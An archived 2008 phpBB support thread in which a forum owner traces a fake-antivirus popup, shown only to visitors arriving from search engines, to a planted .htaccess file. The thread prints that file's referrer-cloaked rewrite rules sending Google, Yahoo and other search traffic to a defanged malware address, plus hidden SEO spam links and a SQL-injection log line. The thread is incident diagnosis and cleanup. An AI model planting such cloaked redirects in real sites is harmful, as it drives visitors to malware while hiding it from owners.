Clicking link in Google launches Spyware

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
Forum rules
Following phpBB2's EoL, this forum is now archived for reference purposes only.
Please see the following announcement for more information: viewtopic.php?f=14&t=1385785
Locked
moocamp
Registered User
Posts: 53
Joined: Sun Feb 12, 2006 6:04 pm

Clicking link in Google launches Spyware

Post by moocamp »

Hi,

I'm a bit concerned that I might have some sort of spyware installed within my forum, and would appreciate some advice.

If I type the address into the address bar (www.moocamp.com), then it takes me to the page ok, but if I click a link from Google, (fourth link down on this page: http://www.google.co.uk/search?hl=en&q= ... rt=10&sa=N ) then it pops up a window and tries to get me to download some antivirus tool or other.

It only does it for this link, and I've had another user report the same problem - can anyone advise what might be going on?
Last edited by ric323 on Sun Aug 10, 2008 11:11 pm, edited 1 time in total.
Reason: Topic icon changed

User avatar
KevC
Support Team Member
Support Team Member
Posts: 69553
Joined: Fri Jun 04, 2004 10:44 am
Location: Oxford, UK
Contact:

Re: Clicking link in Google launches Spyware

Post by KevC »

Never seen that before but I reckon you should contact google.
The identical link for your site works fine so it must be their end. It seems to be redirected away from what google thinks is your site. It just goes straight to the spam link. If you turn off javascript on your browser you'll see what happens.

Incidentally, you have a huge spam problem. Check out the sticky at the top of this forum for a simple fix.
-:|:- Support Request Template -:|:-
Image
Cheap UK Hosting
"In the land of the blind the little green bloke with no pupils is king - init!"

User avatar
ChrisRLG
Former Team Member
Posts: 3420
Joined: Wed Nov 24, 2004 3:18 pm
Location: Essex, UK
Contact:

Re: Clicking link in Google launches Spyware

Post by ChrisRLG »

I asked a few of my friends.

One suggestion is that this is due to the ongoing +DNS exploits.
Derek wrote:I am guessing that one of the +DNS exploits has been done on the name servers for moocamp

I suspect that NS39.EUKDNS.COM has been compromised & any google or probably other search engine referrers to that server get diverted.
I checked and yahoo does the same thing. So he is probably right.

The DNS system is currently being attacked by such exploits in a big way.

It does not look like your own machine is infected, but you might like to tell your hosting co that thier DNS server may be comprimised.

====

Word of warning to anyone reading this.

To follow those links from google could get your own system infected, if you are not on a fully patched windows system. If you do get a warning box say that you might be infected, close the box by clicking the red close icon in the right hand top corner - never from the cancel or such buttons.

If you do not follow that advise and get infected please follow this link and get support from an expert at removal.
approved by the Incident Investigation Team wrote:For cleaning of your own or your users' PCs that may have become infected from this incident, a third-party website can provide further help. The website contains a list of forums manned by specially trained experts in cleaning Microsoft Windows Client Machines (such as Vista & Windows XP). Not something that can be done here at phpBB.com.
phpBB: The All Important Rules - Bertie Bear 3.0 - No support via PM system - use the forums please.
phpBB v2: Retirement (1/1/2009) : phpBB v3: Read Me Topic - Custom BBCodes - Support Template
Matthew 7:7"Ask and it will be given to you; seek and you will find; knock and a door will be opened to you."
My Links: MS MVP (Consumer Security) - Malware Removal:University - Own Forum: Custom BBCode testing

moocamp
Registered User
Posts: 53
Joined: Sun Feb 12, 2006 6:04 pm

Re: Clicking link in Google launches Spyware

Post by moocamp »

Kevin Clark wrote:Never seen that before but I reckon you should contact google.
The identical link for your site works fine so it must be their end. It seems to be redirected away from what google thinks is your site. It just goes straight to the spam link. If you turn off javascript on your browser you'll see what happens.

Incidentally, you have a huge spam problem. Check out the sticky at the top of this forum for a simple fix.
Thanks Kevin.

Any ideas how you contact google?

As for the spam problem, what did you see that identified it as huge (or as a problem at all)? The forum is set to Admin approve, and I do get a fair amount of spam accounts set up. I've installed the "redirect anonymous users to log in" mod, which I'm guessing was the simple fix you referred to (can you let me know if it wasn't?).

Mick.

moocamp
Registered User
Posts: 53
Joined: Sun Feb 12, 2006 6:04 pm

Re: Clicking link in Google launches Spyware

Post by moocamp »

ChrisRLG wrote:I asked a few of my friends.

One suggestion is that this is due to the ongoing +DNS exploits.
Derek wrote:I am guessing that one of the +DNS exploits has been done on the name servers for moocamp

I suspect that NS39.EUKDNS.COM has been compromised & any google or probably other search engine referrers to that server get diverted.
I checked and yahoo does the same thing. So he is probably right.

The DNS system is currently being attacked by such exploits in a big way.

It does not look like your own machine is infected, but you might like to tell your hosting co that thier DNS server may be comprimised.

====

Word of warning to anyone reading this.

To follow those links from google could get your own system infected, if you are not on a fully patched windows system. If you do get a warning box say that you might be infected, close the box by clicking the red close icon in the right hand top corner - never from the cancel or such buttons.

If you do not follow that advise and get infected please follow this link and get support from an expert at removal.
approved by the Incident Investigation Team wrote:For cleaning of your own or your users' PCs that may have become infected from this incident, a third-party website can provide further help. The website contains a list of forums manned by specially trained experts in cleaning Microsoft Windows Client Machines (such as Vista & Windows XP). Not something that can be done here at phpBB.com.

Cheers Chris - I'll have a word with them.

User avatar
ChrisRLG
Former Team Member
Posts: 3420
Joined: Wed Nov 24, 2004 3:18 pm
Location: Essex, UK
Contact:

Re: Clicking link in Google launches Spyware

Post by ChrisRLG »

Please do we (derek & myself) checked the website page for that machine - it has some hidden links to spam like sites - so is almost certainly infected.

This is part of the source code from eukdns.com

Code: Select all

<u style=display:none>
<a href=http://www.woficlub.com>personal finance</a>
<a href=http://www.woficlub.com/press/news>financial news</a>
<a href=http://www.woficlub.com/forum>financial help</a>
<a href=http://www.woficlub.com/Articles>financial articles</a>
<a href=http://woficlub.com/Articles/Mortgage/>mortgage refinance</a>
<a href=http://woficlub.com/Articles/Loan/>loan personal</a>
<a href=http://woficlub.com/Articles/Payday>payday loan</a>
<a href=http://woficlub.com/LinkExchange>link exchange</a></u><body><!--LinkToOtherRandom--><p>
Can see no reason for those sort of links to be present in your hosts website pages.
phpBB: The All Important Rules - Bertie Bear 3.0 - No support via PM system - use the forums please.
phpBB v2: Retirement (1/1/2009) : phpBB v3: Read Me Topic - Custom BBCodes - Support Template
Matthew 7:7"Ask and it will be given to you; seek and you will find; knock and a door will be opened to you."
My Links: MS MVP (Consumer Security) - Malware Removal:University - Own Forum: Custom BBCode testing

User avatar
KevC
Support Team Member
Support Team Member
Posts: 69553
Joined: Fri Jun 04, 2004 10:44 am
Location: Oxford, UK
Contact:

Re: Clicking link in Google launches Spyware

Post by KevC »

moocamp wrote:
As for the spam problem, what did you see that identified it as huge (or as a problem at all)? The forum is set to Admin approve, and I do get a fair amount of spam accounts set up. I've installed the "redirect anonymous users to log in" mod, which I'm guessing was the simple fix you referred to (can you let me know if it wasn't?).

Mick.
When I looked earlier I was able to scan the memberlist. It's full of spambot names. They look typically bot-ish anyway. The simple fix I was referring to is the RAC MOD. It will stop the bots registering in the first place. That will take a lot of grief away from you having to check every account to decide on activation as they simply won't get that far.
-:|:- Support Request Template -:|:-
Image
Cheap UK Hosting
"In the land of the blind the little green bloke with no pupils is king - init!"

moocamp
Registered User
Posts: 53
Joined: Sun Feb 12, 2006 6:04 pm

Re: Clicking link in Google launches Spyware

Post by moocamp »

Thanks guys.

I'm in a 'chat' with their tech support guys at the moment, and they're saying that they aren't getting the same pop up. They're looking into it at the moment, but have just posted that they have "found above logs for my domain"
[Sun Aug 10 22:38:06 2008] [error] [client 79.65.254.87] mod_security: Warning. Pattern match "select.+from" at POST_PAYLOAD [msg "SQL Injection attack"] [severity "EMERGENCY"] [hostname "moocamp.com"] [uri "/privmsg.php"] [unique_id "SJ9fvld14HMAAAkCNzU"]
I've asked what it means, but they have yet to respond - does it mean anything to you?

moocamp
Registered User
Posts: 53
Joined: Sun Feb 12, 2006 6:04 pm

Re: Clicking link in Google launches Spyware

Post by moocamp »

Kevin Clark wrote:
moocamp wrote:
As for the spam problem, what did you see that identified it as huge (or as a problem at all)? The forum is set to Admin approve, and I do get a fair amount of spam accounts set up. I've installed the "redirect anonymous users to log in" mod, which I'm guessing was the simple fix you referred to (can you let me know if it wasn't?).

Mick.
When I looked earlier I was able to scan the memberlist. It's full of spambot names. They look typically bot-ish anyway. The simple fix I was referring to is the RAC MOD. It will stop the bots registering in the first place. That will take a lot of grief away from you having to check every account to decide on activation as they simply won't get that far.
Thanks Kevin - there are a few spam names on there, but they're just the ones from today :cry: I'll go and look at the RAC mod - thanks for the advice.

User avatar
ChrisRLG
Former Team Member
Posts: 3420
Joined: Wed Nov 24, 2004 3:18 pm
Location: Essex, UK
Contact:

Re: Clicking link in Google launches Spyware

Post by ChrisRLG »

That is not the same thing at all.

That is an SQL attack against your own website which the Mod_security script stopped.

They happen almost as background noise against most websites.

You can try to get that machine (The IP code) cleaned by reporting them to thier hosting company. But it has nothing to do with the DNS infection.
phpBB: The All Important Rules - Bertie Bear 3.0 - No support via PM system - use the forums please.
phpBB v2: Retirement (1/1/2009) : phpBB v3: Read Me Topic - Custom BBCodes - Support Template
Matthew 7:7"Ask and it will be given to you; seek and you will find; knock and a door will be opened to you."
My Links: MS MVP (Consumer Security) - Malware Removal:University - Own Forum: Custom BBCode testing

moocamp
Registered User
Posts: 53
Joined: Sun Feb 12, 2006 6:04 pm

Re: Clicking link in Google launches Spyware

Post by moocamp »

He's renamed prvmsg.php saying that it's infected.

and it seems to have solved the problem (but obviously broken the pm system)

Help.

moocamp
Registered User
Posts: 53
Joined: Sun Feb 12, 2006 6:04 pm

Re: Clicking link in Google launches Spyware

Post by moocamp »

The PM system seems to be ok now.

The popup seems to have dissapeared.

At present, the best explanation I've got of what happened is:
I have found some rewrite rule in .htaccess file under home directory

that .htaccess file uploaded by some one cause of that problem
Does that make any sense?

moocamp
Registered User
Posts: 53
Joined: Sun Feb 12, 2006 6:04 pm

Re: Clicking link in Google launches Spyware

Post by moocamp »

OK - detail of what was found:

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]

RewriteRule .* hxxp://87.248.180.90/in.html?s=sg [R,L]

Errordocument 404 hxxp://87.248.180.90/in.html?s=sg_err

above code was in .htaccess file
He's deleted the .htaccess file and advised me to change my cpanel password, which I've done.

Does this make sense?
Last edited by ChrisRLG on Sun Aug 10, 2008 10:35 pm, edited 1 time in total.
Reason: disabled live malware links

User avatar
ChrisRLG
Former Team Member
Posts: 3420
Joined: Wed Nov 24, 2004 3:18 pm
Location: Essex, UK
Contact:

Re: Clicking link in Google launches Spyware

Post by ChrisRLG »

Yes it does make sense.

It looks like you were infected from the cpanel (not phpBB) which is probably not the latest version.

They should still take a look at thier own website page - which has those spam links.
phpBB: The All Important Rules - Bertie Bear 3.0 - No support via PM system - use the forums please.
phpBB v2: Retirement (1/1/2009) : phpBB v3: Read Me Topic - Custom BBCodes - Support Template
Matthew 7:7"Ask and it will be given to you; seek and you will find; knock and a door will be opened to you."
My Links: MS MVP (Consumer Security) - Malware Removal:University - Own Forum: Custom BBCode testing

moocamp
Registered User
Posts: 53
Joined: Sun Feb 12, 2006 6:04 pm

Re: Clicking link in Google launches Spyware

Post by moocamp »

Thanks for all your help Chris.

Locked

Return to “2.0.x Support Forum”